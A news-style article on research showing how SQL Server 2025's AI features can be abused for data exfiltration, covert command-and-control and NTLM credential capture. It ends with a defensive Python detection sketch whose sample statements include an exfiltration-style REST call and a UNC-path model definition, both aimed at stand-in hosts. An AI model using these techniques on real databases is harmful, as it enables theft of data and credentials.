Cybersecurity experts are raising alarms as hackers find innovative ways to misuse enterprise technologies. The latest concern revolves around the AI capabilities integrated into Microsoft SQL Server 2025, which are reportedly being exploited for data theft.
Research conducted by SpecterOps reveals that these AI functionalities can be manipulated to extract sensitive information and facilitate command-and-control operations, all managed from within the database framework.
Originally, SQL Server 2025 was equipped with AI to enhance modern applications like Retrieval-Augmented Generation (RAG). However, the same features are now being subverted as effective tools for cybercriminals.
New AI Features Pose Security Risks
The critical vulnerability lies in the newly added stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to initiate HTTPS communications with outside servers. While intended for legitimate API interactions, this function can be repurposed for unauthorized data transmission.
With support for payloads as large as 100 MB, attackers can efficiently transfer substantial datasets, such as user credentials, across encrypted channels, evading traditional detection methods.
Publicly available proof-of-concept code on platforms like GitHub underscores the discovery and shows that these techniques work in practice.
Exploiting AI for Covert Operations
The CREATE EXTERNAL MODEL feature, when combined with AI_GENERATE_EMBEDDINGS, can be hijacked to communicate covertly. These functions, designed for AI integrations, can mask malicious activities as legitimate data exchanges.
By embedding instructions within AI-generated data, attackers can sustain an undetectable command-and-control infrastructure entirely through SQL queries.
Additionally, by using UNC paths in AI configuration settings, attackers can provoke NTLM authentication over SMB, capturing network credentials.
Protective Measures and Future Implications
The exploitation of these features marks a significant challenge for security teams, who must now differentiate between authentic and malicious database traffic. Traditional security measures, such as scrutinizing outbound traffic, are less effective.
To counter these threats, SpecterOps advises strict regulation of database access, especially for sysadmin roles, and vigilant monitoring of external REST endpoints and AI model interactions for potential abuses.
Restricting database server connections and establishing baseline AI traffic patterns are recommended strategies to identify anomalies.
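As an added illustration of the monitoring and baselining advice above (this is not code from SpecterOps or Microsoft), the following sketch reviews captured T-SQL statement text against a baseline of approved API hosts and external model names. The host names, model names, rule labels and sample statements are constructed for the example, and the regex matching assumes the named @url form of the procedure call.

```python
import re
from urllib.parse import urlsplit

# Assumed baseline for this example: approved API hosts and external model names.
ALLOWED_HOSTS = {"contoso-openai.openai.azure.com"}
ALLOWED_MODELS = {"ragembeddings"}

REST_URL = re.compile(r"sp_invoke_external_rest_endpoint\b.*?@url\s*=\s*N?'([^']*)'", re.I | re.S)
EXTERNAL_MODEL = re.compile(r"\b(?:CREATE|ALTER)\s+EXTERNAL\s+MODEL\b", re.I)
LITERAL = re.compile(r"N?'([^']*)'")
USE_MODEL = re.compile(r"AI_GENERATE_EMBEDDINGS\s*\(.*?\bUSE\s+MODEL\s+\[?(\w+)", re.I | re.S)


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def review_statement(sql):
    """Return (rule, detail) findings for one captured T-SQL statement."""
    findings = []
    # Only the named @url form is parsed; positional calls need a real T-SQL parser.
    for url in REST_URL.findall(sql):
        if host_of(url) not in ALLOWED_HOSTS:
            findings.append(("rest-endpoint-outside-baseline", host_of(url)))
    if EXTERNAL_MODEL.search(sql):
        # Check every string option value rather than assuming which one carries the path.
        for value in LITERAL.findall(sql):
            if value.startswith("\\\\"):  # UNC path: causes SMB/NTLM auth to that host
                findings.append(("external-model-unc-path", value))
            elif "://" in value and host_of(value) not in ALLOWED_HOSTS:
                findings.append(("external-model-endpoint-outside-baseline", host_of(value)))
    for model in USE_MODEL.findall(sql):
        if model.lower() not in ALLOWED_MODELS:
            findings.append(("embedding-call-unbaselined-model", model))
    return findings


# Constructed sample statements, as they might appear in an audit or query-text capture.
SAMPLES = [
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://contoso-openai.openai.azure.com/embed', @payload = @body;",
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://collector.example.net/in', @payload = @rows;",
    r"CREATE EXTERNAL MODEL Helper WITH (LOCATION = '\\files.example.net\share\m', API_FORMAT = 'ONNX Runtime', MODEL_TYPE = EMBEDDINGS, MODEL = 'demo');",
    "SELECT AI_GENERATE_EMBEDDINGS(notes USE MODEL Helper) FROM dbo.Tickets;",
]


def review_all(statements=SAMPLES):
    return [review_statement(s) for s in statements]
```

Only the first sample, which calls an approved host, produces no findings; the other three are flagged for an unapproved REST host, a UNC path in a model definition, and an embedding call through a model outside the baseline.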
This situation underscores the necessity for advanced security protocols accompanying technological advancements, as attackers continue to adapt and exploit emerging software capabilities.
